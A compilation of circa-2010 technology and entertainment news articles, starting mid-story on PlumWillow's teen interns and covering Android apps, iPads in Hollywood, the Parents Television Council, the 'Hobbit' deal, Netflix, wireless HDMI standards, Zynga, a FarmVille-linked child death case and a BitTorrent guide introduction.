Rather, they’re part of a team of 15- and 16-year-old interns who are being tapped for their own special brand of expertise and insight: a bird’s-eye view into the life and mind of high school teenagers, exactly the audience that PlumWillow is seeking.

“They definitely aren’t shy about telling us what they like and don’t like,” says Lindsay Anvik, director of marketing at PlumWillow, who helps oversee the internship program at its offices in Manhattan.

The interns are also emblematic of how Web-based businesses are doing more than merely shaping their products and services around customer preferences. The companies are corralling those customers in the workplace and making them part of the design and marketing process, according to Susan Etlinger, a consultant at the Altimeter Group, which researches Web technologies and advises companies on how to use them.

Of course, search engines like Google and Bing have been racing to tailor their results to individual users, and Facebook is constantly tweaking its algorithm to show members’ updates and the Web links that are most relevant to them.

But what’s happening at PlumWillow is a sign of an even more intimate relationship between a company and its customers.

Moving beyond “the old-fashioned focus group and into co-creation with your demographic is something that will happen more in the next couple of years,” Ms. Etlinger says. “All business will have to learn how to cope with a new generation of users that are used to their particular experience of the Web.”

Because PlumWillow wants to be more than just an online shopping destination — it’s tackling the tricky challenge of recreating the experience of a gaggle of girls going to the mall — its success hinges on getting all the details right, down to the pop songs that girls want to hear while hunting for a new pair of slouchy ankle boots.

“The site needs to be authentic to their voice and how they shop,” says Charlie Federman, PlumWillow’s chairman, whose venture capital firm also led a round of seed funding in the company. “Adults trying to recreate that are just asking for trouble because these kids are smart and sophisticated and know when something is phony.”

The girls were initially brought on as a “sanity test,” Mr. Federman says. “We were all excited and talking about this great idea when we realized a wise thing to do would be to actually talk to some teen girls.”

Once the conversation began, the dynamic changed.

“It went from us talking to them to us listening to them,” says Scott Stone, co-founder and head of business development at PlumWillow. “We decided we might as well institutionalize it and make it part of our culture.”

Two days a week, Ms. Anvik and Tal Flanchraych, the product manager, grill the girls on all kinds of topics, asking whether the site’s comment system is too confusing, for example, or brainstorming about prizes for the site’s Halloween contest.

“Then we go back to our desks and regurgitate everything and think about how it fits into our future planning,” Ms. Flanchraych says.

Nearly 20 girls have cycled through the company since early this year, PlumWillow says.

They help keep the company nimble enough to catch and fix mistakes before they are pushed out to broader audiences, executives say.

“We watch what they click on, see what they do and how they use the site,” says Eric David Benari, another of the site’s founders and its chief technology officer. “It’s not something we can do virtually.”

It’s nothing new for companies to gather input from audiences they serve. Gap recently reverted to its boxy old logo after users complained about a new design. Twitter famously formalized the shorthand of its users as the site began to balloon in popularity.

PlumWillow doesn’t want to wait until it hears — positively or negatively — from its customer. It wants customers in-house so it can always be ahead of the curve.

For PlumWillow, however, the trick is to find a balance between its own strategic direction and fickle consumer feedback.

“You don’t want to put a bunch of teenagers in charge of the site, but they are revealing the way they think about it, which can be extremely useful for a start-up,” says Josh Bernoff, an analyst at Forrester Research. “If you go too far in one direction, you become like a politician pandering to its audience.”

FOR all the effort that the girls are putting into the site, what do they get in return? School credit and ripe material for college application essays, for starters.

But there may be something more in it for them. While many of their peers may spend their internships doing office work at various companies, the PlumWillow interns are getting a taste of the challenges of entrepreneurship.

“I loved seeing the whole process from start to finish,” Ms. Larin says. “Six months ago we were looking at PDFs of the site; now we have the live version that we helped create. It’s incredibly cool to see.”

Russian Hacker Builds 70 Terabyte Home Computer
David Daw

Ever find yourself deleting some files to make room for your overgrown media collection? Thanks to a new hack from a Russian PC enthusiast you should have plenty of room for your MP3 collection, along with the collections of everybody else you know. The hack consists of an array of 60 hard drives and the whole thing holds a whopping 70 terabytes of data.

That translates to 70,000 DVD-quality movies or, if you’re more musically inclined, somewhere in the neighborhood of 24 million songs. Of course, that kind of storage space doesn’t come easy. Besides the 60 drives themselves the rig requires 40 cooling fans to keep the temperature under control.

The final package may not win any awards for case design, but the whole thing has a certain kind of stark utilitarian beauty to it. Presumably the unnamed maker is keeping the case open so he can swap the setup out for even heftier drives as they come along, to keep the project from looking like an absurd relic a decade or so from now thanks to the storage equivalent of Moore’s Law.

App Makers Take Interest in Android
Jenna Wortham

There was cold beer, hot pizza and shop talk at a recent informal gathering of Android programmers in downtown Manhattan. Inevitably the chatter turned to money.

One software developer, James Englert, 26, had just released his first application for Android, Google’s operating system for cellphones. When asked, he tossed out an estimate for his take from sales of the app, a simple program that shows train schedules: “$1 to $2 per day.”

The room erupted with laughter. “That’s pretty good money,” he protested over the clamor.

The others could relate to Mr. Englert’s situation because writing Android software is not yet a ticket to financial success. Even as Android sales surge — Google says it is now activating around 200,000 phones a day — the market for Android apps still seems anemic compared with that for Apple and its thriving App Store.

Experts and developers say that is in part because the Android Market, the dominant store for Android apps, has some clunky features that can be annoying to phone owners who are eager to make a quick purchase. For starters, Android uses Google Checkout rather than an online payment system that more people are familiar with, like PayPal. As a result, many Android developers make their apps available free and rely on mobile advertisements to cover the cost.

“It’s not the best impulse-buy environment,” said Matt Hall, co-founder of a developer outfit called Larva Labs that makes games for Android, iPhone and BlackBerry devices. “It’s hard to think of an application that you would sit there and put your credit card information in for.”

But that tide is starting to turn as Android’s popularity continues to swell and Google takes steps to smooth out some of the wrinkles. For example, the Android Market recently began showing app prices in a user’s local currency, rather than that of the developer.

“We’re still seeing the 1.0 version of the ecosystem,” said Andy Rubin, vice president of engineering at Google and one of the primary architects behind Android. “We think about it every day, how to minimize some of the friction to help the ecosystem rise with the platform.”

Mr. Rubin said there were 270,000 developers writing software for Android, and the number of programs available for download in the Android Market has swelled to more than 100,000, a threefold increase since March.

Developers can feel the shift in momentum. “I used to tell people I wrote software for Android, and they’d look at me like I had three heads,” said Michael Novak, who handles Android development at Medialets, a mobile advertising software company, and helps organize the monthly New York Android Software Developers Meetup. “That wasn’t even a year ago. Now everyone knows what it is. The popularity has exploded.”

Perhaps the biggest point of friction for Android is the same thing that led to its success.

Because Google makes its software available free to a range of phone manufacturers, there are dozens of different Android-compatible devices on the market, each with different screen sizes, memory capacities, processor speeds and graphics capabilities. An app that works beautifully on, say, a Motorola Droid might suffer from glitches on a phone made by HTC. IPhone developers, meanwhile, need to worry about only a few devices: iPhones, iPods and iPads.

When Rovio, the Finnish software development company behind the popular iPhone game Angry Birds, decided to release a version for Android, the company spent months testing the game on a variety of devices to make sure it was up to par.

“It’s so fragmented,” said Peter Vesterbacka, a developer at the company. “It’s a lot more challenging than developing for one device, like the iPhone.”

In the end, he said, it was worth the trouble. The game was downloaded more than three million times in the first week. But the company, which charges 99 cents for the iPhone version and has made millions of dollars that way, chose to give away the Android version and include ads. This is in part because paid apps on the Android Market are available in only 32 countries, versus 90 for the Apple App Store, and Rovio was concerned that people who were not able to purchase the app would just pirate it.

But developers also say that charging for apps simply may not be the path to profit on Android.

“Google is not associated with things you pay for, and Android is an extension of that,” said Mr. Hall of Larva Labs. “You don’t pay for Google apps, so it bleeds into the expectations for the third-party apps, too.”

Google says it eventually hopes to introduce a transaction feature for Android software that will allow purchases within apps, to help developers make more money.

Developers do say that the freedom of Android is a welcome alternative to Apple’s tight control. Android developers have more rein to tinker with the phone’s native functions, like the address book and the basic interface, something Apple has not always allowed. And Apple screens all apps before they can reach its store, while Google imposes no such restriction, relying on Android users to flag malicious or offensive apps.

“With Apple, you can spend months writing software only to be denied,” Mr. Novak said. “The biggest reward as a developer is getting your software out there, and quick. That makes everything else worthwhile.”

Also unlike Apple, Google does not charge developers to download its software development kit, the tools needed to write apps.

Developers are not abandoning iPhone for Android. Instead, they say they are slowly starting to devote more resources to Android in the hope that those efforts will pay off.

They also note that it is a lot easier to stand out in a pool of 100,000 apps versus 300,000, the current tally for the Apple App Store.

“Apple’s App Store is getting overcrowded and saturated,” said Eric Metois, a freelance tech consultant who writes apps on the side for the iPhone and Android.

Mr. Metois’s first iPhone app, iChalky, featuring a dancing stick figure, has sold more than 300,000 copies on the iPhone since it was released in December 2008. His second attempt, a game called Sparticle, was not as successful.

“I poured 500 hours into my second app on the iPhone and sold virtually no copies,” Mr. Metois said. In explaining why he recently released an Android version of iChalky, he said, “There was a chance that on another emerging platform, iChalky would have a similar amount of success.”

Analysts say that if Google wants its mobile software to succeed, it will need to make sure that developers do not lose patience with Android — particularly in light of new competition, including the slate of Windows 7 phones from Microsoft and the iPhone’s inevitable expansion to other carriers in the United States besides AT&T.

Mr. Rubin said he was not worried about rivals’ tempering the momentum of Android because he believed its future would stretch past the cellphone, to tablets and other devices yet to be conceived.

“The promise of Android goes beyond one device,” Mr. Rubin said. “We’re going to see products running Android that no one has ever envisioned possible.”

Pitching Movies or Filming Shows, Hollywood Is Hooked on iPads
Brian Stelter

Last month at a meeting in Hollywood, it was time to plot out the sequel to “Star Trek,” last year’s blockbuster reboot of the sci-fi franchise.

The attendees all brought smartphones — gadgets far more powerful than the videophones imagined by the “Star Trek” writers 40 years ago. Bob Orci brought something the writers back then could only dream of: an iPad.

Mr. Orci, meeting with the producers J. J. Abrams, Damon Lindelof and Bryan Burk, and his fellow writer Alex Kurtzman, jump-started the discussion with an iPad slide show, showing stills from the first film, snapshots of potential locations and a photo of a suggested actress for one of the roles. On the woman’s photo, he had used his iPad to paint on a Vulcan ear.

“When you’re carrying a little TV around, you bring the power of imagery to places that you don’t normally have it,” Mr. Orci said in an interview.

When Apple introduced the iPad six months ago, ushering in an era of tablet computing, experts predicted that tablets would transform the habits of groups of people like college students (who would carry digital textbooks) and doctors (who would manage patient records). They can add Hollywood to the list of those affected.

The iPad is the must-carry accessory on sound stages this season, visible behind the scenes of television and film shoots and in business meetings. When Paula Abdul, the former “American Idol” judge, wants to preview her new dance show for prospective sponsors, she turns on her iPad and pulls up a YouTube video. When Julie Benz, a star of “No Ordinary Family” on ABC, has downtime between shoots, she plays Angry Birds, the popular physics-based puzzle game.

“It’s perfect for the long hours here,” Ms. Benz said in her trailer on the Walt Disney Studios lot this summer.

All this acclaim amounts to free advertising for Apple, which has rarely if ever given away its products to A-list customers. And the use of iPads inevitably ends up inspiring story lines that millions of people see. On the NBC show “The Office” this month, when one character asks what time it is, another character pulls out his iPad, like an oversize pocket watch.

The iPad’s most prominent appearance in prime time came in April, just days after it was put on sale, on the ABC sitcom “Modern Family,” when one of the characters desperately wanted an iPad for his birthday. Eyebrows were raised because Apple’s chief executive, Steven P. Jobs, is on the board of ABC’s parent, Disney. An Apple spokeswoman said the company does not pay for product placement, and an executive producer of “Modern Family,” Steve Levitan, said the iPad story originated with the show’s writers.

Mr. Levitan happens to be an avid iPad user, sometimes posting to Twitter from the tablet.

According to the Nielsen Company, Apple products have popped up about 2,438 times on television programs through September of this year. Some of those are news programs: iPads are visible on the set of the “Fast Money” talk show on CNBC, and Glenn Beck sometimes brings his to “Fox & Friends,” the Fox News morning show.

Hollywood’s converts to the iPad say it can drastically reduce the amount of paper that is wasted on script rewrites.

The actress Dana Delany, who will star in “Body of Proof,” a coming ABC drama, said she now has revisions sent to her digitally. “I think it’s the greatest invention in years,” Ms. Delany said. (The iPad will be a fixture in the medical examiner room on “Body of Proof,” which will start in early 2011.)

Mr. Orci’s iPad has served as the daily “call sheet” with the day’s instructions; acted as a map in an unfamiliar location; and allowed him to keep tabs on “Fringe” and “Hawaii Five-0,” two shows he helps produce. “Oh, and it woke me up in the morning with its alarm,” he said.

His one complaint is that the screen is hard to see in the sun.

There are some iPhone and iPad apps made especially for the entertainment community, like Rehearsal, which helps actors learn their lines. John Carroll Lynch, who appeared in the A&E series “The Glades” last summer and will appear in “Body of Proof” next year, swears by Rehearsal, which was created by the actor David H. Lawrence XVII.

The app imports the script for a television episode. “Then I run the scenes with just the others’ dialogue, and I speak when I’m supposed to be speaking,” he said.

In his downtime in his trailer, Mr. Lynch also plays the Madden 2011 app and watches shows he downloads from iTunes. He said he was surprised by how much he had come to use the tablet.

“It’s like we’re getting to the tricorder,” he said, referring to the scanning and recording gizmo from the original “Star Trek.”

TV Watchdog Group Is on the Defensive
Brooks Barnes

These are difficult days for the decency police.

The Parents Television Council spent most of the last decade as a conservative superstar in the culture wars. By pressuring the Federal Communications Commission to crack down on racy programming, the council was responsible for record-setting fines against media giants like CBS and the News Corporation.

But the organization now finds itself damaged, defanged by court challenges to the F.C.C.’s hard-line position, by its own dwindling finances and by internal troubles that resulted in its accusing a former senior employee of extortion. Meanwhile, the entertainment industry — once so afraid of the council’s wrath that Fox blurred the naked behind of an animated character — is pushing the boundaries of taste with renewed intensity.

Forget cartoon nudity. One of CBS’s new fall sitcoms is called “$#*! My Dad Says.” A catchy song with a highly vulgar title and chorus by the Warner Music Group singer Cee Lo Green has burned up the Web. Miley Cyrus, the 17-year-old Disney star, writhes on a bed in black underwear in her new music video.

The council has tried to focus public indignation on such programming, but the efforts have mostly failed to gain serious traction.

A statement it issued on Oct. 8 regarding Ms. Cyrus’s video, calling it “unfortunate that she would participate in such a sexualized video like this one,” was mild by council standards (and did not note that her father, Billy Ray Cyrus, is on the council’s advisory board).

The council is more exercised by “$#*! My Dad Says,” declaring on Sept. 17 that it would “not rest” until the network changed the title or the show was canceled. It may be a while. Pressure on advertisers has long been one of the sharpest arrows in the council’s quiver, but the sitcom, starring William Shatner, has so far carried a full roster of ads for each episode, according to CBS. One advertiser is Burger King.

New fodder is not in short supply. On Wednesday, the council was infuriated by GQ magazine, which published sexualized photos of “Glee” cast members in its November issue. The actresses, unlike Ms. Cyrus, are adults, but noting that “Glee” is a show about high school, the council issued a statement saying the display “borders on pedophilia.” To what end, though?

“Advertisers still fear the Parents Television Council, but not as much as they used to,” said John Rash, who teaches mass media and politics at the University of Minnesota and is a former executive at Campbell Mithun, a media-buying agency in Minneapolis. “It’s hard for the council to stir up indignation about cultural issues at a time of economic woe.”

Timothy F. Winter, the council’s president, said his organization, albeit weakened because of the recession, was as relevant as ever. This month, for instance, the council announced that it had persuaded pharmaceutical companies to participate in an initiative to alert parents about which broadcast television shows would contain ads for Viagra and other erectile dysfunction drugs. The council also sees progress in forcing the greater regulation of violent video games.

“The downturn had a huge impact, but I feel we’ve turned a corner,” Mr. Winter said. “We’re not out of the woods, but we are told all the time that we are the beacon of light out there. Families rely greatly on our work.”

Mr. Winter said that he was confident that the campaign against CBS would bear fruit. “At the end of the day, we’re hopeful that advertisers will realize they shouldn’t be associated with excrement,” he said.

The troubles of the Parents Television Council, founded in 1995 by the conservative activist L. Brent Bozell III, appear to have started about two years ago. As the organization successfully busied itself with cleaning up America’s airwaves, its internal operations grew messy, an examination of internal documents and Internal Revenue Service forms shows.

Escalating costs collided with declining donations, resulting in a 2008 loss of almost $1 million. In 2009, as the recession battered fund-raising efforts anew, council revenue totaled $2.9 million, a 26 percent drop from the previous year. To cut costs, the organization has reduced its staff by 38 percent over the last two years.

The council’s elaborate reports — given provocative titles like “MTV Smut Peddlers” — have grown infrequent, severely hampering the organization’s lobbying and fund-raising efforts. In 2008, the council published four major reports; it published one in 2009 and has published none so far this year. (Mr. Winter said he planned to publish three reports in the next two months, including one centered on online video.)

During this period, the council encountered difficulties with its direct-mail fund-raising system. Like many nonprofit groups, the council raises money by mail: sign and return this petition — preferably with a donation — and we will send it to the F.C.C. But internal documents show that, at least for a period of some months, the council was opening tens of thousands of envelopes, looking for money, and skipping the rest of the steps.

In a March 2009 e-mail to Mr. Winter, Patrick W. Salazar, who was the council’s vice president for development but is now one of its critics and has been accused by the group of trying to extort money from it, wrote, “Almost 195,000 pieces of donor/member mail was never sent to the intended recipient.” He added, “Most of these were time-sensitive docs whose value is now shot.” That September, Mr. Salazar sent another concerned note to Mr. Winter about the fulfillment of direct-mail petitions.

“Dude, I told you I was working on fulfillment,” Mr. Winter responded. “It is under control.”

Mr. Winter said that he had done his best to sort through the backlog, but he conceded that ultimately, the council decided that a stack of petitions was too old to be of any value. The council says it is now caught up.

Daniel Borochoff, president of the American Institute of Philanthropy, a charity watchdog that gives the council a “C-plus” rating for financial efficiency based on its I.R.S. filings, said unfulfilled direct mail should ring “serious alarms” with potential donors. “It certainly tarnishes the credibility of this organization,” Mr. Borochoff said.

Mr. Salazar was also troubled by membership claims. For instance, council leaders put membership at “more than 1.3 million.” But that number counts people who have signed a petition or donated since the group’s founding, according to the council. In reality, 12,000 people at most respond to annual fund-raising appeals, Mr. Salazar said.

Mr. Winter says there is nothing misleading about the council’s membership claims, asserting that many nonprofit groups count participation in a similar fashion. As for the meager response to fund-raising appeals, Mr. Winter said that is partly a reflection of the number of solicitations sent out. “We can’t afford to communicate with everybody on our total membership list every time,” he said.

In November, Mr. Salazar left the council. He says he quit. The group says he was fired but will not cite a reason. Mr. Salazar then started an effort to extract thousands of dollars in severance by threatening to alert the news media, including The New York Times, about the internal dysfunction he said he witnessed. In addition to the direct-mail predicament and the membership count, Mr. Salazar claimed a laundry list of other wrongdoings.

In a statement, the council said that Mr. Salazar had “demanded that the P.T.C. pay him a substantial sum of cash or he would contact P.T.C. members and the media with certain allegations.” It continued: “His allegations are littered with patently false statements and misrepresentations of the truth. The P.T.C. has refused to negotiate a financial payment (or any other terms).”

The council asked the Los Angeles Police Department to investigate Mr. Salazar for extortion. A police spokesman said an investigation was completed and presented to the city attorney, who rejected it on the grounds that Mr. Salazar’s actions did not constitute a crime.

Mr. Salazar, who is now a fund-raiser for Pierce College in Woodland Hills, Calif., said in an interview that he wanted the council to pay him to go away but denied that his requests amounted to extortion.

As the council was dealing with Mr. Salazar, it ran into another buzz saw. In July, a federal appeals court struck down one of the council’s most promoted achievements, an F.C.C. policy barring the use of “fleeting expletives” on television.

The decision stemmed from a challenge by Fox, CBS and other broadcasters to the F.C.C.’s decision in 2004 to begin enforcing a stricter standard of what kind of language is allowed on free, over-the-air television.

The court unanimously ruled that the policy created a chilling effect because it left broadcasters without a guide to what the commission would find offensive. The F.C.C. has since appealed the ruling, arguing that the court overstepped its bounds. That petition is still pending.

Mr. Winter called the decision “a slap in the face” for families. “We were frankly expecting it,” he said, adding that he was confident the appeal would succeed.

The stated mission of the Parents Television Council is “to restore responsibility and decency to the entertainment industry.” Although officially nonpartisan, it shares office space with another nonprofit group founded by Mr. Bozell, the Media Research Center, which combats what it sees as liberal bias in the news media. Mr. Bozell is paid by both organizations, an arrangement that has been criticized by some watchdogs, including Mr. Borochoff of the American Institute of Philanthropy.

To further its mission, the council uses a combination of technology and human analysts to monitor prime-time programming, particularly on broadcast networks subject to F.C.C. scrutiny. The data is used for a family viewing guide on the council’s Web site; shows are labeled red, yellow or green based on language, violence, depictions of sex and “adult themes.”

Taking the decency battle to advertisers has become a bigger part of the council’s focus since Mr. Winter took over as president in 2007. Each year, the council ranks the 10 best and 10 worst advertisers based on how frequently they sponsor “family-friendly TV programs” or “objectionable content including foul language, violence and sexual themes and images.”

In 2009, General Mills ranked as the best, and the fast-food operator Yum Brands, which owns Taco Bell and KFC, as the worst.

At the moment, the council is focused on advertisers who support “$#*! My Dad Says.” After first singling out national sponsors, the council has shifted its attack to the local level, asking its members to record the show and take note of commercials for local businesses. Members are then supposed to e-mail the lists to the council.

“Your help will assure that CBS gets the message,” read the sign-off to the council’s call to action. “We don’t want any of your $#*! in front of our families!”

New Zealand Reaches Deal on ‘Hobbit’
Jonathan Hutchison

Warner Brothers agreed to keep Peter Jackson’s production of “The Hobbit” in New Zealand after the government promised to change local labor laws and offered extra financial incentives, Prime Minister John Key said Wednesday.

The deal came after two days of talks between Mr. Key and other government officials and executives from Warner and its New Line Cinema unit.

Filming of the two “Hobbit” movies, which is expected to start in February, had been threatened by a dispute over whether a New Zealand branch of an Australian union could engage in collective bargaining on the Hollywood films, which they have not been able to do in the past.

A New Zealand actors union, backed by a larger union, the Media, Entertainment & Arts Alliance of Australia, had demanded collective bargaining for work on the films, but both Warner and government officials contended that collective bargaining with actors was barred by New Zealand law.

The unions withdrew their demand and lifted their call that international unions boycott the films, but Warner executives remained concerned about the possibility of labor disruptions.

As part of the deal to keep production of “The Hobbit” in New Zealand, the government will introduce new legislation on Thursday to clarify the difference between an employee and a contractor, Mr. Key said during a news conference in Wellington, adding that the change would affect only the film industry.

In addition, Mr. Key said the country would offset $10 million of Warner’s marketing costs as the government agreed to a joint venture with the studio to promote New Zealand “on the world stage.”

He also announced an additional tax rebate for the films, saying Warner Brothers would be eligible for as much as $7.5 million extra per picture, depending on the success of the films. New Zealand already offers a 15 percent rebate on money spent on the production of major movies.

Mr. Jackson’s office in New Zealand declined to immediately comment.

The “Hobbit” films, which are being financed in a partnership with Metro-Goldwyn-Mayer, have a production budget of about $500 million, and many in New Zealand believe they are crucial to the future of that country’s film industry.

“I’m delighted we have achieved this result. Making the two movies here will not only safeguard work for thousands of New Zealanders, but will also allow us to follow the success of the Lord of the Rings trilogy in once again promoting New Zealand on the world stage,” Mr. Key said.

“The industrial issues that have arisen in the past several weeks have highlighted a significant set of concerns for the way in which the international film industry operates here in New Zealand. We will be moving to ensure that New Zealand law in this area is settled to give film producers like Warner Brothers the confidence they need to produce their movies in New Zealand.”

Michael Cieply contributed reporting.

Netflix Clangs Death Knell for the Lowly DVD
Robert Cyran

Netflix has rung the death knell for the lowly DVD. Disks haven’t disappeared yet. But the U.S. video rental service says that most of its customers will watch more streamed content than they will from mailed disks in the fourth quarter. Though the DVD is dying swiftly, Netflix has survived this tricky switch from analog to digital and is thriving. Now it needs to see off a whole new slew of well-financed rivals.

Netflix will no longer report the percentage of customers who watch content online. Two-thirds of Netflix customers streamed something in the quarter, up from 41 percent a year earlier. This growth reflects the increased selection of available content; the introduction of a monthly plan that prices unlimited streaming cheaper than basic cable; and the fact that more people have hooked their TVs up to the Internet.

Netflix’s successful transition from mailing DVDs to streaming content is impressive. Its once-robust rival Blockbuster failed to do so—and went bust. Both businesses were built around distributing disks or videos. But Netflix’s knack for technology—evident in its superb movie recommendation algorithm and the way users smoothly stream on devices ranging from PCs to the Wii—allowed it to build barriers around its business.

This is evident in the $8 billion company’s latest quarterly figures. While subscriber numbers grew more than 50 percent over the past year, fewer of them left the service every month. Netflix also spent less than it did a year ago on finding new customers.

But the Internet switch has brought a whole slew of new rivals like Hulu and cash-rich tech behemoths Apple, Amazon and Google’s YouTube into the business. That raises the risk of sharp competition resulting in a price war at the same time Hollywood studios, cable channels and TV networks demand more for allowing their content to be streamed.

Netflix can rest a bit easier knowing that it has avoided the DVD’s fate. But at 44 times estimated 2011 earnings, investors are expecting the firm to avoid newer dangers.

Wired Explains: Wireless Tech to Connect Your TV and PC
Priya Ganapati

Netflix and Hulu make great alternatives to cable TV. The downside: You’ve got to tether a computer to your TV with some kind of cable.

Fortunately, if you’re getting tired of the cord snaking from your laptop to your entertainment center, there’s an alphabet soup of technologies angling to help you out.

Not so fortunately, these technologies are varied and largely incompatible.

Consumers today can choose from WHDI, wireless HD, WiDi, wireless USB and Wi-Fi Direct. Confused? Check out our guide to these emerging wireless streaming-media technologies.


Wireless Home Digital Interface, or WHDI, was finalized in 2009 to give consumers a way to link the PC to the TV. Think of it as the wireless equivalent of HDMI. The technology has a latency of less than 1 millisecond, which means it’s good enough not just for watching movies but should also work well to stream games from your browser to the TV.

WHDI can stream 1080p video at up to 3 Gbps (gigabits per second). All you need is a wireless HDI dongle that can plug into your laptop and a little receiver that goes behind the TV. That set will cost about $150 and will be available early next year.

Meanwhile, TV makers such as Sharp and LG are rolling out TVs with built-in support for the WHDI standard.

Slowly, the WHDI consortium hopes to convince PC makers to integrate WHDI chips into laptops, similar to the way Wi-Fi chips are built in today.


While other wireless technologies focus on streaming content from the PC to the TV, WirelessHD targets the most common electronic eyesore in homes: the black HDMI cables that snake out from behind the TV towards the set-top box, PC or the DVD player.

If built into TV sets, WirelessHD can offer fast data transfers of up to 10 GBps to 28 Gbps. That makes it the fastest of the lot for point-to-point data transfer.

So far, TV makers such as Panasonic, LG and Vizio have said they will offer wireless-HD–enabled sets by the end of the year.

Wireless USB

When the familiar USB port decides to go wireless, it means streaming-media companies can piggyback on to a powerful, widely understood technology.

Wireless USB is based on the Ultra-WideBand (UWB) radio platform. It can send data at speeds of 480 Mbps at distances of up to 10 feet and 110 Mbps at up to 32 feet. Companies such as Logitech already offer UWB-based kits that can be used to connect your PC to the TV.

A startup called Veebeam launched a box that uses wireless USB to stream internet video from your laptop to the TV.

Wireless USB is more powerful for point-to-point connectivity than traditional Wi-Fi, because it offers more bandwidth and less interference, says Veebeam. It estimates 420 Mbps bandwidth for its wireless USB implementation.


Picture yourself downloading a 25-GB Blu-ray disc in less than a minute. That’s what WiGig can do for you, says the Wireless Gigabit Alliance. The Alliance is a consortium of electronics companies that has established a specification for a wireless technology. WiGig could offer users data-transfer speeds ranging from 1 Gbps to 6 Gbps — or at least 10 times faster than today’s Wi-Fi.

The alliance had hoped to make WiGig commonplace by the end of the year, but it has been slow going for the standard, which has not been implemented in any consumer products.


The latest version of the ubiquitous wireless networking technology is 802.11n, also known as Wireless N. With speeds up to 600 Mbps, it’s fast enough to sling plenty of data around your house. Plus it can support up to four simultaneous streams of high-definition video, voice and data, and it’s already built into many devices.

The standard has a powerful backer in Qualcomm, which has been working to create Wireless-N chips that can be embedded into devices like set-top boxes and TV. But while many computer makers have jumped on the technology, consumer electronics companies have been cool to the idea.

Part of the problem is that Wireless N requires you to have a router, which introduces complications many consumer-oriented companies would like to avoid. One possible alternative: Wi-Fi Direct, which supports peer-to-peer connections and can work on 802.11 a/b/g/n. Wi-Fi Direct, formerly known as Wi-Fi Peer-to-Peer, lets devices connect to one another easily for permanent or temporary connections, without requiring them to join the network of a nearby wireless router.

In addition to wirelessly streaming HD content, Wi-Fi Direct will make it easy to send images from your camera to a friend’s HDTV, display PowerPoint slides from your smartphone on a client’s video projector, or send web pages from your tablet to a printer wirelessly.

The Wi-Fi Alliance claims that Wi-Fi Direct will have a range of about 600 feet and about 250 Mbps to 300 Mbps of real throughput. The alliance has announced it will begin certifying products that comply with the standard. That means manufacturers can begin building compatible products, get them tested by the alliance and start marketing the products to consumers, perhaps as early as the next few months.

There are some limitations: Not all Wi-Fi Direct devices will be able to connect with one another. Devices will only be able to connect with devices that have compatible Wi-Fi Direct support. And of course, device makers will have to explain all this to consumers. Good luck with that marketing budget.


Meanwhile, Intel has taken the 802.11 standard to create its own service called WiDi that will be preloaded into many laptops that have Intel chips. Some 44 models of notebooks sold at Best Buy have the WiDi technology already. But consumers will need to buy an additional $100 adapter from Netgear to complete the connection to their TVs.

The wireless streaming is currently limited to 720p resolution, and it can’t handle Blu-ray content, although Intel plans to support higher-resolution video in the future.

Intel’s WiDi technology maxes out at about 9 Mbps and suffers from latency issues. So while it works fine for video, it could be difficult to play a game on a TV that’s wirelessly being streamed from a laptop.

For a handy reference guide, check out the table below to see the different technologies and how they compare. The speed and range are listed per each standard’s theoretical specifications. In the real world, these speeds are likely to be much lower.

WHDI Kits Explored: Asus WiCast, Brite-View HDelight
Dave Altavilla

Home Theater PC buffs rejoice, wireless HDMI technologies have finally come of age. Though there are two camps firmly entrenched in the market (Intel's WiDi and WHDI), the bottom line is lag-free full HD 1080p HDMI wireless video/audio transmission is now a reality. No longer does that HTPC need to be shoehorned into the confines of your entertainment center. And that desktop replacement notebook you have perched on the coffee table just got a major display upgrade, seamlessly connected to your HDTV; look Ma, no wires. Stay with us as we take you through a tour of two WHDI standard-based wireless HDMI transmitter kits--the Asus WiCast and the briteView HDelight. Big screen gaming nirvana and a multitude of media center goodness take center stage at HotHardware.

Both of these WHDI-based kits utilize the same family of Amimon WHDI transmitter and receiver chipsets. The technology is capable of full 1080p HD video and Dolby Digital surround sound audio transmissions over distances of up to 30 feet with less than a millisecond of latency. This new technology is, in a word, "amazing" actually.

FarmVille Worth More Than EA

Zynga, the creator of the popular hit Facebook game FarmVille, should be happy today, as the company’s worth has passed that of EA (Electronic Arts). BusinessWeek reports that the privately held company Zynga is worth 5.51 billion, versus the video game giant EA’s worth of 5.22 billion.

Zynga was founded in July 2007 by Mark Pincus, Michael Luxton, Eric Schiermeyer, Justin Waldron, Andrew Trader, and Steve Schoettle with a starting venture capital of $29 million. Zynga also employs around 1300 employees to date. Zynga’s network of games has a total of approximately 220 million players, who contribute to the company’s continued growth.

Zynga makes its income from in-game payments for items across most of its games and from partnerships with businesses. We will have to see how much further the company can grow in the next couple of years; so far it has been astonishing.

Jacksonville Mom Shakes Baby for Interrupting FarmVille, Pleads Guilty to Murder
David Hunt

A Jacksonville mother charged with shaking her baby to death has pleaded guilty to second-degree murder.

Alexandra V. Tobias, 22, was arrested after the January death of 3-month-old Dylan Lee Edmondson. She told investigators she became angry because the baby was crying while she was playing a computer game called FarmVille on the Facebook social-networking website.

Tobias entered her plea Wednesday before Circuit Judge Adrian G. Soud. A second-degree murder charge is punishable by up to life in prison.

Prosecutor Richard Mantei said Tobias' sentence could be less because of state guidelines that call for 25 to 50 years. Soud offered no promises on what he'll order during a sentencing hearing scheduled for December.

Outside the courtroom, Mantei said Tobias' plea will help avoid the family reliving the tragedy during a jury trial.

Tobias told investigators that she shook the baby, smoked a cigarette to compose herself and then shook him again. She said the baby may have hit his head during the shaking.

How to Boost Your BitTorrent Speed and Privacy
Whitson Gordon

BitTorrent's been around for a whopping ten years, but it continues to evolve and remains one of the best file-sharing tools available. If you really want to make your downloads soar—and keep Big Brother out of your business—this guide's for you.

We showed you how to get started sharing and downloading files with BitTorrent a few years ago, and most of that still applies, but if you're looking to up your BitTorrent skills, things have changed a lot since then.

In fact, some of you may find BitTorrent a bit old school for your tastes. Sure, the ISPs are cracking down and throttling peer-to-peer users, and you have other great file-sharing alternatives like Usenet, but that doesn't mean BitTorrent doesn't still have a place in your routine. It's pretty easy to ward off prying eyes with today's BitTorrent clients, and while Usenet is certainly great, BitTorrent is still more widespread. As such, it tends to have a better selection on certain things, and is at the very least a good fallback method for when you don't find what you're looking for elsewhere. After all, there's no reason you have to be loyal to only one file-sharing protocol.

This intermediate guide to BitTorrent is designed to help you do three things: jack up your speeds, do so without consuming all your bandwidth, and keep unwanted snoopers from seeing what you're doing. We've divided it up into three sections:

• Increase Your Speed and Privacy with a Few Easy Settings
• Keep That Newfound Speed from Hijacking All Your Bandwidth
• Really Hide Your Traffic with External Solutions

